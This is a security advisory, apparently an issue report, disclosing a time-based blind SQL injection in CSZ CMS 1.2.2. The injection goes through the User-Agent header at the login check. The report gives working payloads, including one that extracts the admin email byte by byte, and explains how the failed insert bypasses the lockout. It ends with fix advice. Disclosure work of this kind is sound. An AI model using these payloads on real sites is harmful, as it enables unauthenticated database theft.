Title: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2
Discovered by: @satuer from ABT Labs
Security: high (dump database)
Software: https://github.com/cskaza/cszcms/archive/1.2.2.zip
Description:
There is a high-risk time-based blind SQL injection vulnerability in the frontend login check (http://website/cszcms-1.2.2/member/login/check). Exploiting it, an unauthenticated attacker can dump the whole database.
When logging in through the frontend login page, if the csrf_csz parameter is removed or replaced with an arbitrary string, a row is written to the 'login_logs' table with the reason 'CSRF Protection Invalid'. The 'HTTP_USER_AGENT' value is concatenated directly into that INSERT statement without any escaping or validation, so a crafted User-Agent header injects into the query.
files: cszcms/core/MY_Security.php
login page:
login_logs:
If the csrf_csz parameter is removed and the login is submitted again, a 'CSRF Protection Invalid' log entry is recorded.
login_logs:
Exploit:
Construct a HTTP_USER_AGENT header of the following shape and remove the csrf_csz parameter:
User-Agent: '-( if( condition, sleep(5), 1) )-'', '192.168.1.11','time') #
If the condition is true, the response arrives after 5 seconds; otherwise it returns immediately.
When the UA is '-(if((substr((select email from user_admin limit 1), 1, 1)='1'),sleep(5),1))-'', '192.168.1.11','time') #
the resulting SQL is: INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', ''-(if((substr((select email from user_admin limit 1),1,1)='1'),sleep(5),1))-'', '192.168.1.11','time') #', '192.168.62.1', '2019-06-19 21:17:34.000000')
The INSERT itself does not succeed, because the value supplied for the last column ('time') is not a valid timestamp and the row is rejected. The expressions in the VALUES list are still evaluated before the row is rejected, so the subselect runs, and sleep() runs whenever the condition is true.
As a result, the row count of login_logs does not grow, the source IP is never added to the blacklist, and the $count < 10 check on line 45 always passes. The attacker can therefore dump the whole database one byte at a time without ever being locked out.
Suggest:
Do not concatenate the User-Agent (or any other request-controlled value) into the SQL string. Pass it as a bound parameter or through the query builder so the database driver escapes it; output filtering such as xss_clean() does not prevent SQL injection.
I replaced the old files with the new files and tried again, but unfortunately the problem still exists. And I checked your changes; I think using the xss_clean function couldn't solve the SQL injection problem.